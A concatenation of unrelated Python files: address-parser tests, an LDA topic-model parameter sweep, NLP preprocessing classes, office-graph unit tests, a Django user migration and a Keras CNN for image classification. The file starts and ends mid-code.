def test_postal_code(input, expected):
    ''' test exact string match for postal code '''
    execute_matching_test(input, expected, data_us.postal_code)
@pytest.mark.parametrize("input,expected", [
    # positive assertions: full names, abbreviations and territories, any case
    ("Montana", True),
    ("Nebraska", True),
    ("NJ", True),
    ("DC", True),
    ("PuErTO RIco", True),
    ("oregon", True),
])
def test_region1(input, expected):
    ''' test exact string match for province '''
    execute_matching_test(input, expected, data_us.region1)
@pytest.mark.parametrize("input,expected", [
    # positive assertions
    ("USA", True),
    ("U.S.A", True),
    ("United States", True),
])
def test_country(input, expected):
    ''' test exact string match for country '''
    execute_matching_test(input, expected, data_us.country)
|
# Various preprocessing techniques and n_topics for LDA to optimize Similarity score
# Author: <NAME>
# Last edited: 2022-02-21
#
#%%
import os, sys, re
from nltk.chunk import ne_chunk
import pandas as pd
import numpy as np
from os import path
from argparse import ArgumentParser
from stages.utils.utils import parseArgs, DataCleaner
from stages.TM.textmining import Message, Case, CasesList, lemmatize, gen_words
#%%
# Import, preprocessing, case clustering
infile = path.join("resources", "dataset", "Mail_ApplicationDataset_-2.csv")
# import NLD file
inputFile = pd.read_csv(infile, delimiter=";")
# Project-specific cleaning: strip URLs and extra whitespace, keep case.
cleaner = DataCleaner(
    removeURLs=True,
    removeMultWhitespace=True,
    lowercasing=False,
    dateFormat="%Y-%m-%d %H:%M:%S"
)
cleaner.apply(inputFile)
# Group mails into cases; mails more than 14 days apart start a new case.
casesList = CasesList.groupCases(file=inputFile, maxDays=14)
#casesList.prettyprint()
#%%
# Text mining
# 1. step: Preprocesing
import nltk
nltk.download("stopwords")
from nltk.corpus import stopwords
# gensim
import gensim
import gensim.corpora
from gensim.utils import pickle, simple_preprocess
from gensim.models import CoherenceModel
# spacy
import spacy
# vis
import pyLDAvis
import pyLDAvis.gensim_models as gensimvis
stopwords = stopwords.words("english")
corpora_msg = casesList.getCorpora()
len(corpora_msg)
#%%
corpora_lemmatized = lemmatize(corpora_msg)
corpora_prep = gen_words(corpora_lemmatized)
#%%
# 2. step: build up clusters using LDA and visualize them
# identify bigrams and trigrams
bigrams_phrases = gensim.models.Phrases(
    corpora_prep,
    min_count=5,
    threshold=20
)
# Trigrams are learned on top of the bigrammed corpus.
trigram_phrases = gensim.models.Phrases(
    bigrams_phrases[corpora_prep],
    threshold=20
)
# Freeze the trained phrase models into fast, immutable Phrasers.
bigram = gensim.models.phrases.Phraser(bigrams_phrases)
trigram = gensim.models.phrases.Phraser(trigram_phrases)
def make_bigrams(texts):
    # Apply the trained bigram Phraser to every tokenized document.
    return [bigram[document] for document in texts]
def make_trigrams(texts):
    # Bigrams first, then the trigram Phraser on top of the bigrammed tokens.
    return [trigram[bigram[document]] for document in texts]
data_bigrams = make_bigrams(corpora_prep)
data_bigrams_trigrams = make_trigrams(data_bigrams)
# Train with dataset
id2word = gensim.corpora.Dictionary(data_bigrams_trigrams)
# Bag-of-words representation of each document.
corp = [id2word.doc2bow(text) for text in data_bigrams_trigrams]
#%% TF IDF removal - better not!
# Rebuilds the dictionary/corpus from the plain (non-bigrammed) corpus, then
# drops low-TF-IDF terms from each bag of words.
id2word = gensim.corpora.Dictionary(corpora_prep)
corp = [id2word.doc2bow(text) for text in corpora_prep]
from gensim.models import TfidfModel
tfidf = TfidfModel(corp, id2word=id2word)
low_value = 0.02 # threshold
words = []
words_missing_in_tfidf = []
for i in range(0,len(corp)):
    bow = corp[i]
    low_value_words = []
    tfidf_ids = [id for id,value in tfidf[bow]]
    bow_ids = [id for id,value in bow]
    low_value_words = [id for id,value in tfidf[bow] if value < low_value]
    # NOTE(review): `drops` uses `words_missing_in_tfidf` from the PREVIOUS
    # iteration (it is recomputed only below). This only skews the `words`
    # log list; `new_bow` below uses the fresh value, so filtering is correct.
    drops = low_value_words+words_missing_in_tfidf
    for item in drops:
        words.append(id2word[item])
    words_missing_in_tfidf = [id for id in bow_ids if id not in tfidf_ids] # words with tfidf score == 0
    new_bow = [b for b in bow if b[0] not in low_value_words and b[0] not in words_missing_in_tfidf]
    corp[i] = new_bow
#%%
#%% LDA Model
# NOTE(review): this rebuilds id2word/corp from the plain corpus, discarding
# both the bigram/trigram corpus and the TF-IDF filtering performed above.
id2word = gensim.corpora.Dictionary(corpora_prep)
corp = [id2word.doc2bow(text) for text in corpora_prep]
#%%
# Hyperparameter Optimization
# Start of optimization operation: sweep the number of topics from 5 to 30
# and score each LDA model by how consistently labelled messages land in one
# detected topic.
num_pool = list(range(5, 31))
pool_scores = []
for pool in num_pool:
    lda_model = gensim.models.ldamodel.LdaModel(
        corpus=corp,
        id2word=id2word,
        num_topics=pool,
        random_state=100,  # fixed seed so runs are comparable across `pool`
        update_every=1,
        chunksize=100,
        passes=10,
        alpha="auto"
    )
    # assign detected labels to every message
    for case in casesList:
        for message in case.messages:
            cor = message.subject + " " + message.content
            new_text_corpus = id2word.doc2bow(cor.split())
            # Topic with the highest probability for this message.
            highestPercentageLabel = max(lda_model[new_text_corpus], key=lambda x: x[1])[0]
            # Internal mail (same domain on both sides) is forced to label 3.
            if (message.from_.split("@")[1] == message.to.split("@")[1]):
                message.detectedLabel = 3
            else:
                message.detectedLabel = highestPercentageLabel
    # get all train labels
    labels = casesList.getTrainLabels()
    # get amount of similar classifications for each label
    quotas = []
    print(f"Stats for n_topics={pool}:")
    print("---------------------------")
    for label in labels:
        # get all messages with label and check similar
        msg = casesList.getMessagesByLabel(label)
        detectedLabels = [m.detectedLabel for m in msg]
        try:
            # Most frequent detected topic (ties broken by the largest id),
            # considering only topics detected more than twice.
            max_ocurr = (max(sorted(set([i for i in detectedLabels if detectedLabels.count(i)>2]))))
        except ValueError:
            # BUG FIX: this previously assigned `max_occur` (typo), leaving
            # `max_ocurr` undefined (NameError) or stale from the prior label.
            # Also narrowed the bare `except:` — max() on an empty sequence
            # raises ValueError.
            max_ocurr = 0
        num = detectedLabels.count(max_ocurr)
        rest = len(detectedLabels) - num
        quota = num / (rest + num)
        print(f"Correctly identified messages for label {label}: {num}/{num+rest}={quota}")
        quotas.append([quota, len(detectedLabels)])
    # Weight each label's quota by its message count for the overall score.
    label_elcounts = [x[1] for x in quotas]
    labelscores = [x[0] for x in quotas]
    weighted = [a*b for a, b in zip(label_elcounts, labelscores)]
    overall = sum(weighted) / sum(label_elcounts)
    print(f"Overall result: {overall}")
    pool_scores.append((pool, overall, quotas))
#%%
# Save Parameter Study values for later plotting (change filename accordingly)
# NOTE(review): this `pickle` import shadows the `pickle` name imported from
# gensim.utils earlier in the file.
import pickle
filename = "lemma_simple_tfidf3.pkl"
p = path.join("out", "parameter_study")
with open(path.join(p, filename), "wb") as f:
    pickle.dump(pool_scores, f)
import _pickle
import os
import numpy as np
# Special vocabulary entries occupying the first indices of every word dict.
DEFAULT_PADDING_LABEL = '<pad>'  # dict index = 0
DEFAULT_UNKNOWN_LABEL = '<unk>'  # dict index = 1
DEFAULT_RESERVED_LABEL = ['<reserved-2>',
                          '<reserved-3>',
                          '<reserved-4>']  # dict index = 2~4
DEFAULT_WORD_TO_INDEX = {DEFAULT_PADDING_LABEL: 0, DEFAULT_UNKNOWN_LABEL: 1,
                         DEFAULT_RESERVED_LABEL[0]: 2, DEFAULT_RESERVED_LABEL[1]: 3,
                         DEFAULT_RESERVED_LABEL[2]: 4}
# the first vocab in dict with the index = 5
def save_pickle(obj, pickle_path, file_name):
    """Serialize *obj* into ``pickle_path/file_name`` and report the save.

    :param obj: any picklable object
    :param pickle_path: str, directory to write into (must already exist)
    :param file_name: str, name of the pickle file; conventionally ends in "pkl"
    """
    target = os.path.join(pickle_path, file_name)
    with open(target, "wb") as handle:
        _pickle.dump(obj, handle)
    print("{} saved in {}".format(file_name, pickle_path))
def load_pickle(pickle_path, file_name):
    """Deserialize and return the object stored in ``pickle_path/file_name``.

    :param pickle_path: str, directory containing the pickle file
    :param file_name: str, name of the pickle file
    :return: the unpickled object
    """
    source = os.path.join(pickle_path, file_name)
    with open(source, "rb") as handle:
        loaded = _pickle.load(handle)
    print("{} loaded from {}".format(file_name, pickle_path))
    return loaded
def pickle_exist(pickle_path, pickle_name):
    """Check if a given pickle file exists in the directory.

    Side effect: creates ``pickle_path`` (and parents) when it does not exist,
    matching the original behavior so later saves into it cannot fail.

    :param pickle_path: the directory of target pickle file
    :param pickle_name: the filename of target pickle file
    :return: True if file exists else False
    """
    if not os.path.exists(pickle_path):
        os.makedirs(pickle_path)
    # Simplified: return the boolean directly instead of if/else True/False.
    return os.path.exists(os.path.join(pickle_path, pickle_name))
class BasePreprocess(object):
"""Base class of all preprocessors.
Preprocessors are responsible for converting data of strings into data of indices.
During the pre-processing, the following pickle files will be built:
- "word2id.pkl", a mapping from words(tokens) to indices
- "id2word.pkl", a reversed dictionary
- "label2id.pkl", a dictionary on labels
- "id2label.pkl", a reversed dictionary on labels
These four pickle files are expected to be saved in the given pickle directory once they are constructed.
Preprocessors will check if those files are already in the directory and will reuse them in future calls.
"""
def __init__(self):
    # Both mappings are built later by run(); None means "not constructed yet".
    # word2index: token -> integer id; label2index: class label -> integer id.
    self.word2index = None
    self.label2index = None
@property
def vocab_size(self):
return len(self.word2index)
@property
def num_classes(self):
return len(self.label2index)
def run(self, train_dev_data, test_data=None, pickle_path="./", train_dev_split=0, cross_val=False, n_fold=10):
"""Main preprocessing pipeline.
:param train_dev_data: three-level list, with either single label or multiple labels in a sample.
:param test_data: three-level list, with either single label or multiple labels in a sample. (optional)
:param pickle_path: str, the path to save the pickle files.
:param train_dev_split: float, between [0, 1]. The ratio of training data used as validation set.
:param cross_val: bool, whether to do cross validation.
:param n_fold: int, the number of folds of cross validation. Only useful when cross_val is True.
:return results: a tuple of datasets after preprocessing.
"""
if pickle_exist(pickle_path, "word2id.pkl") and pickle_exist(pickle_path, "class2id.pkl"):
self.word2index = load_pickle(pickle_path, "word2id.pkl")
self.label2index = load_pickle(pickle_path, "class2id.pkl")
else:
self.word2index, self.label2index = self.build_dict(train_dev_data)
save_pickle(self.word2index, pickle_path, "word2id.pkl")
save_pickle(self.label2index, pickle_path, "class2id.pkl")
if not pickle_exist(pickle_path, "id2word.pkl"):
index2word = self.build_reverse_dict(self.word2index)
save_pickle(index2word, pickle_path, "id2word.pkl")
if not pickle_exist(pickle_path, "id2class.pkl"):
index2label = self.build_reverse_dict(self.label2index)
save_pickle(index2label, pickle_path, "id2class.pkl")
data_train = []
data_dev = []
if not cross_val:
if not pickle_exist(pickle_path, "data_train.pkl"):
data_train.extend(self.to_index(train_dev_data))
if train_dev_split > 0 and not pickle_exist(pickle_path, "data_dev.pkl"):
split = int(len(data_train) * train_dev_split)
data_dev = data_train[: split]
data_train = data_train[split:]
save_pickle(data_dev, pickle_path, "data_dev.pkl")
print("{} of the training data is split for validation. ".format(train_dev_split))
save_pickle(data_train, pickle_path, "data_train.pkl")
else:
data_train = load_pickle(pickle_path, "data_train.pkl")
if pickle_exist(pickle_path, "data_dev.pkl"):
data_dev = load_pickle(pickle_path, "data_dev.pkl")
else:
# cross_val is True
if not pickle_exist(pickle_path, "data_train_0.pkl"):
# cross validation
data_idx = self.to_index(train_dev_data)
data_cv = self.cv_split(data_idx, n_fold)
for i, (data_train_cv, data_dev_cv) in enumerate(data_cv):
save_pickle(
data_train_cv, pickle_path,
"data_train_{}.pkl".format(i))
save_pickle(
data_dev_cv, pickle_path,
"data_dev_{}.pkl".format(i))
data_train.append(data_train_cv)
data_dev.append(data_dev_cv)
print("{}-fold cross validation.".format(n_fold))
else:
for i in range(n_fold):
data_train_cv = load_pickle(pickle_path, "data_train_{}.pkl".format(i))
data_dev_cv = load_pickle(pickle_path, "data_dev_{}.pkl".format(i))
data_train.append(data_train_cv)
data_dev.append(data_dev_cv)
# prepare test data if provided
data_test = []
if test_data is not None:
if not pickle_exist(pickle_path, "data_test.pkl"):
data_test = self.to_index(test_data)
save_pickle(data_test, pickle_path, "data_test.pkl")
# return preprocessed results
results = [data_train]
if cross_val or train_dev_split > 0:
results.append(data_dev)
if test_data:
results.append(data_test)
if len(results) == 1:
return results[0]
else:
return tuple(results)
def build_dict(self, data):
raise NotImplementedError
def to_index(self, data):
raise NotImplementedError
def build_reverse_dict(self, word_dict):
id2word = {word_dict[w]: w for w in word_dict}
return id2word
def data_split(self, data, train_dev_split):
"""Split data into train and dev set."""
split = int(len(data) * train_dev_split)
data_dev = data[: split]
data_train = data[split:]
return data_train, data_dev
def cv_split(self, data, n_fold):
"""Split data for cross validation."""
data_copy = data.copy()
np.random.shuffle(data_copy)
fold_size = round(len(data_copy) / n_fold)
data_cv = []
for i in range(n_fold - 1):
start = i * fold_size
end = (i + 1) * fold_size
data_dev = data_copy[start:end]
data_train = data_copy[:start] + data_copy[end:]
data_cv.append((data_train, data_dev))
start = (n_fold - 1) * fold_size
data_dev = data_copy[start:]
data_train = data_copy[:start]
data_cv.append((data_train, data_dev))
return data_cv
class SeqLabelPreprocess(BasePreprocess):
    """Preprocess pipeline for sequence labelling.

    Builds word/label vocabularies and converts string sequences into index
    sequences.  Designed for three-level lists with one label per token::

        [
            [ [word_11, word_12, ...], [label_1, label_1, ...] ],
            [ [word_21, word_22, ...], [label_2, label_1, ...] ],
            ...
        ]
    """

    def __init__(self):
        super(SeqLabelPreprocess, self).__init__()

    def build_dict(self, data):
        """Assign a fresh index to every unseen word and label in *data*.

        :param data: three-level list (see class docstring)
        :return word2index: dict of {str, int}
                 label2index: dict of {str, int}
        """
        # Both vocabularies start from the shared reserved entries
        # (padding/unknown), so real tokens receive the subsequent ids.
        word2index = DEFAULT_WORD_TO_INDEX.copy()
        label2index = DEFAULT_WORD_TO_INDEX.copy()
        for example in data:
            for token, tag in zip(example[0], example[1]):
                word2index.setdefault(token, len(word2index))
                label2index.setdefault(tag, len(label2index))
        return word2index, label2index

    def to_index(self, data):
        """Replace every word/label string by its vocabulary index.

        Unknown strings fall back to the reserved <unk> index.

        :param data: three-level list (see class docstring)
        :return data_index: same nesting as *data*, with strings replaced by ints
        """
        unk_index = DEFAULT_WORD_TO_INDEX[DEFAULT_UNKNOWN_LABEL]
        data_index = []
        for example in data:
            # zip truncates to the shorter of the two sequences, exactly as
            # the original pairwise iteration did.
            pairs = list(zip(example[0], example[1]))
            word_ids = [self.word2index.get(w, unk_index) for w, _ in pairs]
            label_ids = [self.label2index.get(t, unk_index) for _, t in pairs]
            data_index.append([word_ids, label_ids])
        return data_index
class MultiFeaSeqpreprocess(BasePreprocess):
    """Sequence-labelling preprocessor for examples with several parallel features.

    Each example is a list whose leading elements are token-aligned sequences
    (the sentence itself plus extra per-token feature sequences), optionally
    followed by single-value (non-sequence) features.  One vocabulary is built
    per sequence feature.
    """

    def __init__(self):
        super(MultiFeaSeqpreprocess, self).__init__()

    def build_dict(self, data):
        """Build one vocabulary per sequence feature.

        The first sample decides which positions are sequence features
        (list-valued).  Position 0 becomes the "sent" vocabulary with
        reserved <pad>/<unk> entries; other sequence features get empty
        vocabularies named "fea_<i>".

        :param data: list of examples (see class docstring)
        :return: dict mapping vocabulary name -> {value: index}
        """
        if not isinstance(data, list):
            raise RuntimeError("the type of data is wrong")
        # Inspect the first sample to find which positions hold sequences.
        sample = data[0]
        dict_ = {}
        for i, fea in enumerate(sample):
            if isinstance(fea, list):
                if i == 0:
                    dict_["sent"] = {'<pad>': 0, "<unk>": 1}
                else:
                    # NOTE(review): feature vocabularies start empty and never
                    # receive "<unk>", so to_index's dic_["<unk>"] fallback
                    # would raise KeyError on an unseen feature value -
                    # confirm unseen values cannot occur at inference time.
                    dict_["fea_" + str(i)] = {}
        fea_num = len(dict_)
        # Relies on dict preserving insertion order (Python 3.7+) so that the
        # i-th vocabulary lines up with the i-th sequence feature position.
        for example in data:
            for fea in zip(*example[:fea_num]):
                for i, dic_name in enumerate(dict_):
                    if fea[i] not in dict_[dic_name]:
                        dict_[dic_name][fea[i]] = len(dict_[dic_name])
        return dict_

    def run(self, train_dev_data, test_data=None, pickle_path="./", train_dev_split=0, cross_val=False, n_fold=10):
        """Build/load all vocabularies, index the data, and optionally split
        off a validation set.  All artifacts are cached as pickles.

        NOTE(review): test_data, cross_val and n_fold are accepted for
        signature compatibility with BasePreprocess.run but are ignored here.
        """
        if pickle_exist(pickle_path, "all_dicts.pkl"):
            self.all_dicts = load_pickle(pickle_path, "all_dicts.pkl")
        else:
            self.all_dicts = self.build_dict(train_dev_data)
            save_pickle(self.all_dicts, pickle_path, "all_dicts.pkl")
        if not pickle_exist(pickle_path, "rev_dicts.pkl"):
            rev_dicts = self.build_reverse_dict(self.all_dicts)
            save_pickle(rev_dicts, pickle_path, "rev_dicts.pkl")
        data_train = []
        data_dev = []
        if pickle_exist(pickle_path, "data_train.pkl") and pickle_exist(pickle_path, "data_dev.pkl"):
            data_train = load_pickle(pickle_path, "data_train.pkl")
            data_dev = load_pickle(pickle_path, "data_dev.pkl")
        else:
            data_train.extend(self.to_index(train_dev_data))
            if train_dev_split > 0 and not pickle_exist(pickle_path, "data_dev.pkl"):
                split = int(len(data_train) * train_dev_split)
                data_dev = data_train[: split]
                data_train = data_train[split:]
                save_pickle(data_dev, pickle_path, "data_dev.pkl")
                print("{} of the training data is split for validation. ".format(train_dev_split))
            save_pickle(data_train, pickle_path, "data_train.pkl")
        results = [data_train]
        if cross_val or train_dev_split > 0:
            results.append(data_dev)
        if len(results) == 1:
            return results[0]
        else:
            return tuple(results)

    def to_index(self, data):
        """Replace sequence-feature values by indices.

        Non-sequence (single-value) features are passed through unchanged and
        appended after the indexed sequence features of each example.
        """
        # sample = data[0]
        # fea_num=len(sample)
        seq_fea_num = len(self.all_dicts)
        data_index = []
        for example in data:
            # Trailing elements of the example are single-value features.
            single_fea = example[seq_fea_num:]
            ex_list = [[] for i in range(seq_fea_num)]
            for fea in zip(*example[:seq_fea_num]):
                for i, char in enumerate(fea):
                    if i == 0:
                        dic_ = self.all_dicts["sent"]
                    else:
                        dic_ = self.all_dicts["fea_" + str(i)]
                    if char in dic_:
                        ex_list[i].append(dic_[char])
                    else:
                        # Falls back to "<unk>"; see the NOTE in build_dict
                        # about feature vocabularies lacking this entry.
                        ex_list[i].append(dic_["<unk>"])
            data_index.append(ex_list)
            data_index[-1].extend(single_fea)
        return data_index

    def build_reverse_dict(self, all_dict):
        """Invert every vocabulary: {name: {value: index}} -> {name: {index: value}}."""
        rev_dicts = {}
        for dic_name in all_dict:
            rev_dicts[dic_name] = {all_dict[dic_name][w]: w for w in all_dict[dic_name]}
        return rev_dicts
class ClassPreprocess(BasePreprocess):
    """Preprocess pipeline for classification datasets.

    Builds word/label vocabularies and converts samples into indices.
    Designed for three-level lists with a single label per sample::

        [
            [ [word_11, word_12, ...], label_1 ],
            [ [word_21, word_22, ...], label_2 ],
            ...
        ]
    """

    def __init__(self):
        super(ClassPreprocess, self).__init__()

    def build_dict(self, data):
        """Build the word and label vocabularies.

        Samples whose sentence has at most one token are skipped entirely
        (neither their words nor their label are recorded).

        :return: (word2index, label2index), both dicts of {str: int}
        """
        # Start both mappings from the shared reserved default entries.
        word2index = DEFAULT_WORD_TO_INDEX.copy()
        label2index = DEFAULT_WORD_TO_INDEX.copy()
        for sentence, label in data:
            if len(sentence) <= 1:
                # Ignore degenerate samples.
                continue
            label2index.setdefault(label, len(label2index))
            for token in sentence:
                word2index.setdefault(token, len(word2index))
        return word2index, label2index

    def to_index(self, data):
        """Convert word strings and each sample's single label into indices.

        Unknown words/labels map to the reserved <unk> index.

        :return data_index: same shape as data, with strings replaced by indices
        """
        unk_index = DEFAULT_WORD_TO_INDEX[DEFAULT_UNKNOWN_LABEL]
        data_index = []
        for example in data:
            # example[0] is the word list, example[1] is the single label
            token_ids = [self.word2index.get(token, unk_index) for token in example[0]]
            data_index.append([token_ids, self.label2index.get(example[1], unk_index)])
        return data_index
def infer_preprocess(pickle_path, data):
    """Preprocess inference data: transform a two-level list of word strings
    into a two-level list of word indices, using the saved vocabulary.

    ::

        [
            [word_11, word_12, ...],
            [word_21, word_22, ...],
            ...
        ]

    :param pickle_path: str, directory containing "word2id.pkl"
    :param data: two-level list of word strings
    :return data_index: same shape as data, each word replaced by its index
    """
    word2index = load_pickle(pickle_path, "word2id.pkl")
    # Bug fix: unknown words must fall back to the <unk> *index*, not the
    # <unk> label string, so the output stays homogeneous (all ints) and
    # consistent with SeqLabelPreprocess.to_index / ClassPreprocess.to_index.
    unknown_index = DEFAULT_WORD_TO_INDEX[DEFAULT_UNKNOWN_LABEL]
    data_index = []
    for example in data:
        data_index.append([word2index.get(w, unknown_index) for w in example])
    return data_index
# ---- end of concatenated file segment ----
import unittest
from ospacial.officegraph import OfficeGraph
class TestOfficeGraph(unittest.TestCase):
    """Tests for OfficeGraph: a rank x rank grid of desks plus one extra
    node (the food truck) reachable only from the front row.

    Desks are numbered row by row from 0; the food-truck id is rank ** 2.
    """

    def setUp(self):
        # One rank-10 and one rank-5 office grid.
        self.large = OfficeGraph(10)
        self.small = OfficeGraph(5)

    def test_target_id(self):
        # The food-truck node id equals rank ** 2.
        self.assertEqual(100, self.large.target)
        self.assertEqual(25, self.small.target)

    def test_num_nodes(self):
        # rank ** 2 desks plus the single food-truck node.
        self.assertEqual(101, len(self.large.graph.nodes()))
        self.assertEqual(26, len(self.small.graph.nodes()))

    def test_back_row(self):
        # The back row holds desks 0 .. rank - 1.
        self.assertEqual(set(range(10)), self.large.back_row())
        self.assertEqual(set(range(5)), self.small.back_row())

    def test_all_desks(self):
        # Every desk id: 0 .. rank ** 2 - 1.
        self.assertEqual(set(range(100)), self.large.all_desks())
        self.assertEqual(set(range(25)), self.small.all_desks())

    def test_front_row_can_reach_target(self):
        # Front-row desks (rank * (rank - 1) .. rank ** 2 - 1) border the truck.
        for desk in range(90, 100):
            self.assertTrue(100 in self.large.graph.neighbors(desk))
        for desk in range(20, 25):
            self.assertTrue(25 in self.small.graph.neighbors(desk))

    def test_other_rows_cant_reach_target(self):
        # No other desk may reach the food truck directly.
        for desk in range(0, 90):
            self.assertFalse(100 in self.large.graph.neighbors(desk))
        for desk in range(0, 20):
            self.assertFalse(25 in self.small.graph.neighbors(desk))

    def test_can_move_front_back(self):
        # Vertical neighbours differ by exactly one rank (n - rank, n + rank).
        self.assertTrue(32 in self.large.graph.neighbors(42))
        self.assertTrue(52 in self.large.graph.neighbors(42))

    def test_can_move_left_right(self):
        # Horizontal neighbours differ by exactly one (n - 1, n + 1).
        self.assertTrue(41 in self.large.graph.neighbors(42))
        self.assertTrue(43 in self.large.graph.neighbors(42))

    def test_cant_move_diagonally(self):
        # No diagonal edges: n +/- rank +/- 1 must not be adjacent.
        for diagonal in (31, 33, 51, 53):
            self.assertFalse(diagonal in self.large.graph.neighbors(42))

    def assertNeighboursOf(self, og, node_list, neighbours_of):
        # The neighbour set of *neighbours_of* must be exactly *node_list*.
        expected = set(node_list)
        actual = set(og.graph.neighbors(neighbours_of))
        self.assertEqual(expected, actual)

    def test_valid_move_scenarios(self):
        # Corners, edges and interior desks have exactly the expected
        # row/column neighbours (plus the truck, for front-row desks).
        self.assertNeighboursOf(self.large, [1, 10], 0)
        self.assertNeighboursOf(self.large, [0, 11, 20], 10)
        self.assertNeighboursOf(self.large, [0, 2, 11], 1)
        self.assertNeighboursOf(self.large, [5, 14, 16, 25], 15)
        self.assertNeighboursOf(self.large, [53, 62, 64, 73], 63)
        self.assertNeighboursOf(self.large, [8, 19], 9)
        self.assertNeighboursOf(self.large, [80, 91, 100], 90)
        self.assertNeighboursOf(self.large, [88, 97, 99, 100], 98)

    def test_valid_move_scenarios_when_apply_occupancy(self):
        # Occupied desks disappear from their neighbours' adjacency.
        self.large.apply_occupancy([53, 98])
        self.assertNeighboursOf(self.large, [62, 64, 73], 63)
        self.assertNeighboursOf(self.large, [42, 51, 62], 52)
        self.assertNeighboursOf(self.large, [78, 87, 89], 88)
        self.assertNeighboursOf(self.large, [89, 100], 99)

    def test_hot_list(self):
        # Occupying the entire front row yields a total heat of 20,
        # none of which lands on the front row itself.
        self.small.apply_occupancy(range(20, 25))
        heat = self.small.hot_list()
        self.assertEqual(sum(heat), 20)
        self.assertEqual(sum(heat[:-5]), 20)
        self.assertEqual(sum(heat[20:]), 0)
# Allow running this test module directly with the standard unittest runner.
if __name__ == '__main__':
    unittest.main()
# ---- end of concatenated file segment ----
# filename: users/migrations/0001_initial.py
# Generated by Django 2.1.7 on 2019-03-05 14:22
from django.db import migrations, models
import django.db.models.deletion
import users.models
class Migration(migrations.Migration):
    """Initial migration for the users app.

    Creates the custom ``User`` model: email-based login plus contact,
    address and social-media fields, a foreign key to ``location.City``,
    and a custom ``UserManager``.  Auto-generated by Django; do not edit
    field definitions by hand.
    """

    initial = True

    dependencies = [
        ('auth', '0009_alter_user_last_name_max_length'),
        ('location', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='User',
            fields=[
                # Standard Django auth/permission fields.
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('password', models.CharField(max_length=128, verbose_name='password')),
                ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
                ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
                # Email is the unique identifier (no username field).
                ('email', models.EmailField(max_length=254, unique=True, verbose_name='email address')),
                ('first_name', models.CharField(blank=True, max_length=30, verbose_name='first name')),
                ('last_name', models.CharField(blank=True, max_length=30, verbose_name='last name')),
                ('date_joined', models.DateTimeField(auto_now_add=True, verbose_name='date joined')),
                ('is_active', models.BooleanField(default=True, verbose_name='active')),
                ('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff')),
                # Privacy preferences and contact details.
                ('share_email', models.BooleanField(default=False)),
                ('share_phone', models.BooleanField(default=False)),
                ('phone_number', models.CharField(blank=True, max_length=20, null=True)),
                ('mobile_phone_number', models.CharField(blank=True, max_length=20, null=True)),
                ('org_name', models.CharField(blank=True, max_length=128, null=True, verbose_name='organization name')),
                ('profile_picture', models.ImageField(blank=True, null=True, upload_to='users/user/profile-picture')),
                # Postal address fields.
                ('postal_code', models.CharField(blank=True, max_length=32, null=True)),
                ('address', models.CharField(blank=True, max_length=256, null=True)),
                ('number', models.CharField(blank=True, max_length=32, null=True)),
                ('complement', models.CharField(blank=True, max_length=128, null=True)),
                ('district', models.CharField(blank=True, max_length=128, null=True)),
                # Social-media links.
                ('url_facebook_profile', models.URLField(blank=True, null=True, verbose_name='Profile Facebook URL')),
                ('url_facebook_page', models.URLField(blank=True, null=True, verbose_name='Page Facebook URL')),
                ('url_twitter', models.URLField(blank=True, null=True, verbose_name='Twitter URL')),
                ('url_instagram', models.URLField(blank=True, null=True, verbose_name='Instagram URL')),
                # Relations.
                ('city', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='users', to='location.City')),
                ('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
                ('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
            ],
            options={
                'verbose_name': 'user',
                'verbose_name_plural': 'users',
            },
            managers=[
                ('objects', users.models.UserManager()),
            ],
        ),
    ]
# ---- end of concatenated file segment ----
import os
import tensorflow as tf
from tensorflow.keras import layers, models
import matplotlib.pyplot as plt
import numpy as np
class CNN_B1(object):
    """CNN for task B1: three convolutional blocks followed by a dense head
    that classifies 100x100 RGB images into 5 classes (softmax output)."""

    def __init__(self):
        # Assemble the network layer by layer; the architecture is identical
        # to the original sequential stack.
        net = models.Sequential()
        stack = [
            layers.Conv2D(32, (5, 5), activation='relu', input_shape=(100, 100, 3)),
            layers.MaxPooling2D((2, 2)),
            layers.Dropout(0.1),
            layers.Conv2D(64, (5, 5), activation='relu'),
            layers.MaxPooling2D((2, 2)),
            layers.Dropout(0.5),
            layers.Conv2D(64, (3, 3), activation='relu'),
            layers.Flatten(),
            layers.Dense(64, activation='relu'),
            layers.Dense(5, activation='softmax'),
        ]
        for layer in stack:
            net.add(layer)
        # Print the architecture summary, as the original constructor did.
        net.summary()
        self.model = net
class Utils_B1:
    """Training/evaluation wrapper around :class:`CNN_B1` for task B1."""

    def __init__(self):
        print("Processing task B1")
        # Build the (untrained) CNN once; train()/test() operate on it.
        self.cnn = CNN_B1()

    def train(self, train_imgs, train_labels):
        """Compile and fit the CNN on the given images and integer labels.

        Uses the Adam optimizer with sparse categorical cross-entropy,
        8 epochs and a 20% validation split.

        :return: (final validation accuracy, final validation loss)
        """
        # Optional: Function to plot learning curves
        def plot_curve(title, train_val, train_loss, val_val, val_loss, num_epoch, axes=None, ylim=None):
            # Draws score (axes[0]) and loss (axes[1]) curves side by side;
            # only used by the commented-out plotting call below.
            num = np.linspace(1, num_epoch, num_epoch)
            axes[0].set_title(title)
            if ylim is not None:
                axes[0].set_ylim(*ylim)
            axes[0].set_xticks(num)
            axes[0].set_xlabel("Number of epochs")
            axes[0].set_ylabel("Score")
            axes[0].grid()
            axes[0].plot(num, train_val, 'o-', color="r",
                         label="Training score")
            axes[0].plot(num, val_val, 'o-', color="g",
                         label="Cross-validation score")
            axes[0].legend(loc="best")
            axes[1].grid()
            axes[1].plot(num, train_loss, 'o-', color="r",
                         label="Training loss")
            axes[1].plot(num, val_loss, 'o-', color="g",
                         label="Cross-validation loss")
            axes[1].legend(loc="best")
            axes[1].set_title("Training Loss v.s. Validation Loss")
            axes[1].set_xticks(num)
            axes[1].set_xlabel("Number of epochs")
            axes[1].set_ylabel("Loss")
            plt.show()
            return plt
        num_epochs, val_split = 8, 0.2
